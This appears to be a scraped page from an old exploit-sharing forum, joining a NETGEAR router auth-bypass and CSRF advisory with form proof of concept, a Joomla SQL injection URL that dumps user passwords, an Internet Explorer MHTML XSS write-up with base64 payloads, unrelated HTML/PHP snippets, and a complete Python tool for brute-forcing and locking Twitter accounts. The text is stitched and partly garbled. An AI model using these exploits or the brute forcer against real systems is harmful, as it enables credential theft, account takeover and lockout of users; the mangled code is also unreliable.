NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

HTML Code:

Release Date.                  20-Sep-2011 Last Update.                    - Vendor Notification Date.      22-Mar-2011 Product.                        NETGEAR Wireless Cable Modem Gateway                                 CG814WG Affected versions.             Hardware 1.03,                                 Software V3.9.26 R14 verified,                                 possibly others Severity Rating.               High Impact.                         Authentication bypass,                                 Cross Site Request Forgery Attack Vector.                 Remote without  authentication Solution Status.               Upgrade to R15 (by  contacting NETGEAR) CVE reference.                 Not yet assigned    Details. The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by  ISP's as customer premises equipment within Australia and abroad. It is  a centrally managed ISP solution whereby each ISP's devices run a  customised firmware and configuration changes and updates can be pushed  out as required.   Basic authentication is used as the primary and only  authentication mechanism for the administrator interface on the device.  The basic authentication can be bypassed by sending a valid POST request  to the device without sending any authentication header. The response  from the device sends the user to another page that requests basic  authentication, however at this point the request has already been  processed.   An example of attacks using the basic authentication bypass  may include changing the admin password or enabling the remote admin  interface (Internet facing).   Additionally, due to the lack of CSRF  protection in the web application, the bypass attack can be coupled with  CSRF to have a victim enable the remote admin interface to the  Internet, where an attacker can then use the bypass attack again across  the remote admin interface to reset the admin password and access the  device. This attack is possible when targeting a victim that is behind  the NETGEAR device on the same segment as the web administrator  interface whom has browsed to a malicious site containing the CSRF  attack.   NETGEAR was notified of this vulnerability on 22 March 2011,  but we never received a response or acknowledgement of the issue or fix.  Sense of Security notified local ISP's and it was escalated by a local  ISP who worked with NETGEAR to develop and test an update. Sense of  Security was never provided an opportunity to validate the fixes in the  latest firmware version. Given the severity of the issue it would be  prudent for NETGEAR to notify and supply an update to all of its  customers.   Proof of Concept. By embedding the below HTML in a website  and having a victim browse to the website the remote management  interface to the Internet would be enabled. An attacker could then use  one of the hardcoded passwords for the device to access it, or use a  basic authentication bypass to change the admin password. Alternatively,  the attacker could conduct a CSRF attack that implements two POST  requests to have the remote admin interface enabled, and the admin  password changed.   The example here is a basic proof of concept, more  complex examples which include JavaScript redirects to mask the basic  authentication pop-up would be more stealthy.      

"http://192.168.0.1/goform/RgRemoteManagement"
method="POST" name="form"> "hidden"  name="NetgearRmEnable" value="0x01"> "hidden"  name="NetgearRmPortNumber" value="1337"> "hidden"  name="NetgearUserLevel" value="1">      Solution. Ask your ISP to obtain the latest firmware  from NETGEAR and deploy it to your device.   Discovered by. Sense of  Security Labs.  :80:

Read More

Joomla Component Jobprofile SQL INJECTION

FROM:1337day.com

Code:

[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011
 
[ Software Information ]
 
[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -
 
[ Vulnerable File ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
 
[ XpL ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--

 

Read More

Microsoft Internet Explorer MHTML Protocol Handler XSS

Hacking with mhtml protocol handler
 
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
 
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks...
 
1.Cross Site Scripting by upload mhtml file
 
Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the  mhtml file to a *.jpg file,etc. then upload it to the target site...
 
ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions
 
then use iframe tag src to it:
 

 
2.Cross Site Scripting mhtml-file string injection
 
the mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked.
 
poc:
 
test it on win7 system pls.
 

 
if win-xp or win2k3 system,pls do it by the second urlencode.
 
mhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :)
 
3.bypass X-Frame-Options
 
X-Frame-Options did not protect the mhtml protocol handler.
 
the demo:
 


 
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul
 
Billy (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used  "Script src to local files in the LocalLow directory" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it.
 
Demo:
 
test it on win2k3+ie8+Adobe Reader 9
 
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
 
 
5.mhtml+file://uncpath+word == local xss vul
 
demo:http://www.80vul.com/mhtml/word.doc
 
download it, and save it on c:\word.doc and open it. u can get the alert c:\boot.ini 's content.
 
this is base on "Microsoft word javascript execution"(http://marc.info/?l=bugtraq&m=121121432823704&w=2).
 
to make the proof of concept follow the following steps:
 
1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in aaaaa 
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file
 
xss code
---------------------------------------------------------

aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
if u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :)
  
"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm
 
update
ofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL()
 
 
6. Coss Zone Scripting
 
First we would like to mention a very old vulnerability:
 

 
This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on "My Computer" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3
 
Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:
 
xss code
---------------------------------------------------------

aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
 
thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.
 
 
About Ph4nt0m Webzine
 
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank 

Read More

Admin login Page

Coded by ME

Admin login panel page

Code below

Code:

  

 

    
 

      

Crash_Override Admin Control Panel  Login


  



  



    
Enter your username and pass (case sensitive)

  






 



  
Username: 

  



 


  
Password: 

  


  


  
 

  


  




  COOKIES MUST BE ENABLED ON YOUR WEB BROWSER!


   


  







 

Read More

HTML maintenance page

Created by Crash_Override

Code:

 

Website is currently under construction




Note: Website will be up soon




Contact Administrators

Email:


  
  


  
    
  



We will contact you in the next 24 hours.

Read More

Minichat (php)

Minichat no MySQL need

Add the bellow code in your page:

PHP Code:

 

<button onmouseover="this.style.cursor='pointer'";  onClick="send()"><img src="images/send.gif" width="133">button><br>
<input style="background: black; color: white; text-align: center" onFocus="value=''" type="text"  name="search" id="chat"  value="">
<br>
<div id="frame1">
<iframe width="153" src="jkgh1g5h1j5gh12k5g21hk5gh5gf12tjf12cj125jyc2y5l6glug36gl36lg6gyk5f12yk1fgk515k125gyk251h125vh125kjhv51k.php">
iframe>
<script>
function send()
{
var message = document.getElementById('chat').value;
var meslen = document.getElementById('chat').value.length;
if (meslen <= 0)
{alert('Please,write the message.');
}
else if (meslen >= 81)
{alert('Maximum characters in your messages must be 80');
}
else
{document.getElementById("frame1").innerHTML='+message+'">';
}
} 

Read More

twitter brute force (py)

CODE:

#!/usr/bin/python
# Toolname   : twitteater.py
# Programmer : gunslinger_ 
# my forum   : www.devilzc0de.org/forum
# Version    : v1.0
# This was written for educational purpose only. 
# Use this at your own risk.
# Author will be not responsible for any damage !
# I'm preffer using curl on system than using pycurl

import sys, time, StringIO, commands, re, os, random 

# Define variable
__programmer__ = "gunslinger_ "
__version__    = "1.0"
twittbird    = '''
   +++                    ++++  ++++       +++
  +++++                                 ++++  ++++        +++++
  +++++                                  ++   ++++        +++++
  ++++++++++++++  ++       ++      ++         ++++        +++++           ++++         ++++++
  ++++++++++++++ ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++++++++    ++++++++++
  +++++          ++++     ++++    ++++  ++++  +++++++++++ +++++++++++  +++++   +++++  ++++++++++
  +++++          ++++     ++++    ++++  ++++  ++++++++++  +++++++++    +++++++++++++ +++++
  +++++          ++++    ++++++   ++++  ++++  +++++       +++++        +++++++++++++ ++++
   ++++++++++++  ++++++ +++++++  +++++  ++++   +++++++++   +++++++++   ++++          ++++
    ++++++++++++  +++++++++++++++++++   ++++    +++++++++   ++++++++   +++++++++++   ++++
     ++++++++++     +++++++  ++++++     ++++     ++++++++    +++++++     ++++++++    ++++
     "The bird has been eaten by python snake..."
     
     Programmer : %s
     Version    : %s
     Twitter bruteforcer & freezer
''' % (__programmer__, __version__)

option           = '''
Usage  : %s [options]
Option : -u, --username            |   User for bruteforcing
         -w, --wordlist            |   Wordlist used for bruteforcing
     -s, --singlepass          |   Use single password (for update status only) 
     -d, --updatestatus             |   Post new status at given username        
         -v, --verbose                |   Set %s will be verbose
         -p, --proxy             |   Set proxy will be use
         -t, --timeout             |   Set %s timeout request time (default : 15)
         -r, --refferer              |   Set %s refferer will be use (default : random)
         -f, --freeze                |   freeze user, user will be unable login for any minute
         -l, --log             |   Specify output filename (default : twitteater.log)
         -h, --help                    |   Print this help
                                                            
Example : 
     - bruteforcing mode  ~> %s -u brad@hackme.com -w wordlist.txt 
     - freeze mode          ~> %s -u brad@hackme.com -f
     - update status mode ~> %s -u brad@hackme.com -s hackmeifyoucan -d "Beware of Programmers who carry screwdrivers. -- Leonard Brandwein"
       
P.S : add "&" to run in the background  
''' % (sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0], sys.argv[0])

hme = '''
Usage : %s [option]
    -h or --help for get help''' % sys.argv[0]

refferer     = ['http://twitter.com/',
        'http://twitter.com/login',
        'http://twitter.com/about/contact',
        'http://blog.twitter.com/',
        'http://status.twitter.com/',
        'http://twitter.com/about',
        'http://twitter.com/about'
           ]

ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
            'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
            'Microsoft Internet Explorer/4.0b1 (Windows 95)',
            'Opera/8.00 (Windows NT 5.1; U; en)',
        'amaya/9.51 libwww/5.4.0',
        'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
        'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
        ]
freeze = False
upstat = False
brute = False
counter = 1
# warn , twitter will lock username after 17 x login attempt (tested)
maxlock = 18
verbocity = ''
proxy     = ''
background = ''
timeout      = '15'
statsurl  = 'http://twitter.com/statuses/update.xml'
credential = 'http://twitter.com/account/verify_credentials.xml'
green     = '\033[38m'
red     = '\033[31m'
reset     = '\033[0;0m'
log = "twitteater.log"
file = open(log, "a")

def helpme():
    print twittbird
    print option
    file.write(twittbird)
    file.write(option)
    sys.exit(1)
    
def helpmee():
    print twittbird
    print hme
    file.write(twittbird)
    file.write(hme)
    sys.exit(1)
        
for arg in sys.argv:
    if arg.lower() == '-u' or arg.lower() == '--user':
                username = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                brute = True
        elif arg.lower() == '-f' or arg.lower() == '--freeze':
                freeze = True
        elif arg.lower() == '-d' or arg.lower() == '--updatestatus':
            newstatus = sys.argv[int(sys.argv[1:].index(arg))+2]
            newstatus = newstatus.replace("_"," ")
                upstat = True
        elif arg.lower() == '-t' or arg.lower() == '--timeout':
                timeout = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-s' or arg.lower() == '--singlepass':
                password = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-r' or arg.lower() == '--refferer':
                refferer = sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-p' or arg.lower() == '--proxy':
                proxy = '-x '+sys.argv[int(sys.argv[1:].index(arg))+2]
        elif arg.lower() == '-v' or arg.lower() == '--verbose':
            verbocity = "-v"
        elif arg.lower() == '-l' or arg.lower() == '--log':
            log = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
            helpme()
    elif len(sys.argv) <= 1:
        helpmee()

def updatestatus():
    
    trytwitter = 'curl -u %s:%s %s -d status=\"%s\" %s --connect-timeout %d -A \"%s\" %s' % (username, password, statsurl, newstatus, verbocity, int(timeout), random.choice(ouruseragent), proxy)
    restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
    updated = re.findall("", restwitter)
    duplicate = re.findall("Status is a duplicate.", restwitter)
    if verbocity == "-v":
        print restwitter
    if duplicate:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Duplicate status found\"")
        print "[*] Duplicate status is not accepted by twitter, please don't reduplicate it\n"
        file.write("\n[*] Duplicate status is not accepted by twitter, please don't reduplicate it!\n\n")
        sys.exit(1)
    if updated:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status successfully\"")
        print "[*] Update status : %s%s%s has been posted successfully ! \n" % (red, newstatus, reset)
        file.write("\n[*] Update status : %s has been posted successfully !\n\n" % (newstatus))
        sys.exit(1)
    else:
        os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"update status failed\"")
        print "[*] password is wrong ! \n" 
        file.write("\n[*] password is wrong !\n\n")
        sys.exit(1)

def freezemode():
    global counter
    if freeze:
        print "[*] Trying to freeze account %s%s%s, user will be unable login for hour(s)" % (red, username, reset)
        file.write("\n[*] Trying to freeze account %s, user will be unable login for hour(s)" % (username))
        try:
            while counter <= maxlock:
                sys.stdout.write("\r[*] %s%d%s try has gived...                          " % (red, int(counter), reset))
                sys.stdout.flush()
                trytwitter = 'curl -u %s:freeze %s %s --connect-timeout %d' % (username, credential, verbocity, int(timeout))
                restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
                locked = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
                if locked:
                    os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account successfully freeze\"")
                    print "\n[*] Acount freeze %s%s%s succeded, and unable for login for %d seconds !" % (red, username, reset, int(locked[0]))
                    file.write("\n[*] Acount freeze %s succeded, and unable for login for %d seconds !\n\n" % (username, int(locked[0])))
                    sys.exit(1)
                if verbocity == "-v":
                    print restwitter
                counter = int(counter) + 1
        except KeyboardInterrupt:
            print "\n[-] Deactivated freezing mode\n"
            file.write("\n[-] Deactivated freezing mode\n")
            sys.exit(1)
        
def twitteater(word):
    global counter
    sys.stdout.write("\r[*] Trying %s is %s%d%s of %s%d%s                                  " % (word, red, int(counter), reset, red, len(words), reset))
    sys.stdout.flush()
    file.write("\n[*] Trying %s is %d of %d                                                \n" % (word, int(counter), len(words)))
         try:
        trytwitter = 'curl -u %s:%s %s -A "%s" %s -e %s --connect-timeout %d %s' % (username, word, credential, random.choice(ouruseragent), verbocity, random.choice(refferer), int(timeout), proxy)
        restwitter = StringIO.StringIO(commands.getstatusoutput(trytwitter)[1]).read()
        partwitter = re.findall("", restwitter)
        sick = re.findall("This account is locked due to too many failed login attempts -- try again in ([\d.]*\d+) seconds", restwitter)
        if sick:
            print "\n[*] Account %s%s%s has been freeze by twitter" % (red, username, reset)
            file.write("\n[*] Account %s has been freeze by twitter" % (username))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"Account has been freeze\"")
            sleeper = 0
            while sleeper <= int(sick[0]):
                sys.stdout.write("\r[*] Waiting %d second(s) for start bruteforcing again...           " % (int(sick[0])))
                sys.stdout.flush()
                sleeper = int(sleeper) + 1
                sick[0] = int(sick[0]) - 1
                time.sleep(1)
        if partwitter:
            print "\n[*] Account has been login successfully !"
            print "[*] Username : %s%s%s" % (red, username, reset)
            print "[*] Password : %s%s%s" % (red, word, reset)
            file.write("\n[*] Account has been login successfully !\n")
            file.write("[*] Username : %s\n" % (username))
            file.write("[*] Password : %s\n\n" % (word))
            os.system("notify-send -i `pwd`/twitter.jpg -u normal -t 5000 \"Twitteater\" \"login successfull !\"")
            sys.exit(1)
        if verbocity == "-v":
            print restwitter
    except KeyboardInterrupt:
        print "\n[-] Deactivated bruteforcing mode...\n"
        file.write("\n[-] Deactivated bruteforcing mode...\n")
        sys.exit(1)
    counter = int(counter) + 1
          
def bruteforcemode():
    global word        
    for word in words:
        twitteater(word.replace("\n",""))    

def main():
    global words
    print twittbird
    file.write(twittbird)
    print "[*] Starting attack at %s" % time.strftime("%X")
    file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
    if freeze:
        print "[*] %sFreeze%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Freeze mode activated")
    elif brute:
        print "[*] %sBruteforce%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] bruteforce mode activated")
    elif upstat:
        print "[*] %sUpdate status%s mode %sactivated%s" % (red, reset, red, reset)
        file.write("\n[*] Update status mode activated")
    print "[*] Using PID : %s%s%s \n" % (red, os.getpid(), reset)
    file.write("\n[*] Using PID : %s \n" % (os.getpid()))
    if freeze:
        freezemode()
    if upstat:
        updatestatus()
    if brute:     
        try:
            preventstrokes = open(wordlist, "r")
            words            = preventstrokes.readlines()
            count          = 0 
            while count < len(words): 
                words[count] = words[count].strip() 
                count += 1 
        except(IOError): 
              print "\n[-] Error: Check your wordlist path\n"
            file.write("\n[-] Error: Check your wordlist path\n")
              sys.exit(1)
        bruteforcemode()
        twitteater(word)

    
if __name__ == '__main__':
    main()

Read More